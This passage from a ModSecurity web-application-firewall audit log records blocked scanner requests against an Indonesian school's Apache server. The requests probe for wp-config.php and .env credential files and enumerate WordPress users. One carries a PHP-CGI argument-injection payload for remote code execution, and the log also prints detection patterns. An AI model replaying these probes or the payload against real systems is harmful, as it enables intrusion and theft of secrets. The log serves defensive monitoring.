"117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721771237525 867 (- - -) Stopwatch2: 1745721771237525 867; combined=380, p1=316, p2=0, p3=0, p4=0, p5=63, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eebb33d-Z-- --8a60ee1e-A-- [27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0trAAAAEs 103.236.140.4 45406 103.236.140.4 8181 --8a60ee1e-B-- GET /wp-config.php8 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --8a60ee1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a60ee1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721771796178 684 (- - -) Stopwatch2: 1745721771796178 684; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a60ee1e-Z-- --54c15377-A-- [27/Apr/2025:09:42:52 +0700] aA2ZrCKLpK55oNIcEw0trQAAAEw 103.236.140.4 45412 103.236.140.4 8181 --54c15377-B-- GET /wp-config.php9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --54c15377-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54c15377-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721772326271 756 (- - -) Stopwatch2: 1745721772326271 756; combined=291, p1=253, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54c15377-Z-- --08ca9d64-A-- [27/Apr/2025:09:42:52 +0700] aA2ZrP7FMV4FIoAOnu7e5gAAAAA 103.236.140.4 45414 103.236.140.4 8181 --08ca9d64-B-- GET /wp-config.php10 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --08ca9d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08ca9d64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721772832521 705 (- - -) Stopwatch2: 1745721772832521 705; combined=276, p1=239, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08ca9d64-Z-- --622b243d-A-- [27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e5wAAAAU 103.236.140.4 45420 103.236.140.4 8181 --622b243d-B-- GET /wp-config.php11 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --622b243d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --622b243d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721773373809 711 (- - -) Stopwatch2: 1745721773373809 711; combined=299, p1=251, p2=0, p3=0, p4=0, p5=48, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --622b243d-Z-- --6a3b0f04-A-- [27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e6AAAAAQ 103.236.140.4 45422 103.236.140.4 8181 --6a3b0f04-B-- GET /wp-config.php12 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --6a3b0f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3b0f04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721773929180 667 (- - -) Stopwatch2: 1745721773929180 667; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3b0f04-Z-- --c6236461-A-- [27/Apr/2025:14:30:09 +0700] aA3dAcO7TUCRYJ_xfldCUAAAANE 103.236.140.4 59612 103.236.140.4 8181 --c6236461-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.46.105.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.46.105.196 X-Forwarded-Proto: http Connection: close Accept: */* --c6236461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6236461-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745739009122593 721 (- - -) Stopwatch2: 1745739009122593 721; combined=278, p1=236, p2=0, p3=0, p4=0, p5=41, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6236461-Z-- --bc565342-A-- [27/Apr/2025:14:30:20 +0700] aA3dDP7FMV4FIoAOnu7-MQAAAAc 103.236.140.4 59654 103.236.140.4 8181 --bc565342-B-- GET /wp-config.php.orig HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 162.241.225.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.241.225.150 X-Forwarded-Proto: http Connection: close Accept: */* --bc565342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc565342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745739020215316 879 (- - -) Stopwatch2: 1745739020215316 879; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc565342-Z-- --a07edb30-A-- [27/Apr/2025:16:33:30 +0700] aA356v7FMV4FIoAOnu4J5AAAABg 103.236.140.4 35610 103.236.140.4 8181 --a07edb30-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.211.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.211.110.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a07edb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07edb30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745746410652504 790 (- - -) Stopwatch2: 1745746410652504 790; combined=363, p1=328, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07edb30-Z-- --6fea567f-A-- [27/Apr/2025:17:57:40 +0700] aA4NpCKLpK55oNIcEw1WXQAAAFQ 103.236.140.4 55062 103.236.140.4 8181 --6fea567f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --6fea567f-C-- --6fea567f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fea567f-E-- --6fea567f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745751460504787 4018 (- - -) Stopwatch2: 1745751460504787 4018; combined=2935, p1=504, p2=2398, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fea567f-Z-- --c535496f-A-- [27/Apr/2025:18:39:31 +0700] aA4Xc8O7TUCRYJ_xfldPpAAAAM0 103.236.140.4 36516 103.236.140.4 8181 --c535496f-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 167.172.75.203 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 167.172.75.203 Accept-Encoding: gzip X-Varnish: 138742264 --c535496f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c535496f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745753971453044 761 (- - -) Stopwatch2: 1745753971453044 761; combined=334, p1=301, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c535496f-Z-- --a29d9a39-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-62wAAAJQ 103.236.140.4 47310 103.236.140.4 8181 --a29d9a39-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a29d9a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a29d9a39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747607473 667 (- - -) Stopwatch2: 1745756747607473 667; combined=270, p1=242, p2=0, p3=0, p4=0, p5=28, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a29d9a39-Z-- --634d5f11-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63AAAAJg 103.236.140.4 47314 103.236.140.4 8181 --634d5f11-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --634d5f11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --634d5f11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747712444 689 (- - -) Stopwatch2: 1745756747712444 689; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --634d5f11-Z-- --141bce34-A-- [27/Apr/2025:19:25:47 +0700] aA4iSxkilNlaTSHUe0-63QAAAIo 103.236.140.4 47318 103.236.140.4 8181 --141bce34-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 165.22.245.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.22.245.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --141bce34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --141bce34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745756747985739 685 (- - -) Stopwatch2: 1745756747985739 685; combined=259, p1=227, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --141bce34-Z-- --68a31770-A-- [27/Apr/2025:22:16:18 +0700] aA5KQiKLpK55oNIcEw1sPgAAAEM 103.236.140.4 47068 103.236.140.4 8181 --68a31770-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --68a31770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68a31770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745766978621318 715 (- - -) Stopwatch2: 1745766978621318 715; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68a31770-Z-- --5f491c15-A-- [27/Apr/2025:22:32:24 +0700] aA5OCBkilNlaTSHUe0_M_gAAAI0 103.236.140.4 50604 103.236.140.4 8181 --5f491c15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f491c15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f491c15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745767944436824 3101 (- - -) Stopwatch2: 1745767944436824 3101; combined=1346, p1=443, p2=873, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f491c15-Z-- --875c2926-A-- [27/Apr/2025:22:32:26 +0700] aA5OCv7FMV4FIoAOnu4y_wAAABA 103.236.140.4 50616 103.236.140.4 8181 --875c2926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --875c2926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --875c2926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745767946786084 2574 (- - -) Stopwatch2: 1745767946786084 2574; combined=1388, p1=425, p2=928, p3=0, p4=0, p5=34, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --875c2926-Z-- --695db701-A-- [27/Apr/2025:22:32:29 +0700] aA5ODSKLpK55oNIcEw1tlAAAAEc 103.236.140.4 50628 103.236.140.4 8181 --695db701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --695db701-C-- demo.sayHello --695db701-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --695db701-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745767949125718 6182 (- - -) Stopwatch2: 1745767949125718 6182; combined=4584, p1=634, p2=3698, p3=31, p4=38, p5=106, sr=139, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --695db701-Z-- --c7b5c77c-A-- [27/Apr/2025:22:32:45 +0700] aA5OHf7FMV4FIoAOnu4zBwAAAA4 103.236.140.4 50696 103.236.140.4 8181 --c7b5c77c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7b5c77c-C-- demo.sayHello --c7b5c77c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b5c77c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745767965882704 6474 (- - -) Stopwatch2: 1745767965882704 6474; combined=4843, p1=671, p2=3890, p3=37, p4=40, p5=118, sr=117, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 